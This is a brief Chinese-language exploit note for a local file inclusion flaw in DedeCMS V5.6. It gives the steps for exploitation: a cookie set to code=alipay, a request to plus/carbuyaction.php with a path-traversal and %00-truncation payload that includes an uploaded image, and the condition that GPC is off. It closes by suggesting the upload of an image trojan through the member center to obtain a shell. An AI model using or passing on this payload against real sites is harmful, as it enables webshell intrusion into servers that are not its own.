dedecms一处文件包含漏洞

影响版本

DedeCmsV5.6 本地包含

利用方法

首先利用cookie修改工具,加上 code=alipay

然后访问

http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00

直接包含成功

利用条件为GPC OFF ,或者某些环境下的截断。

可以在会员中心里上传个图片木马进行拿shell。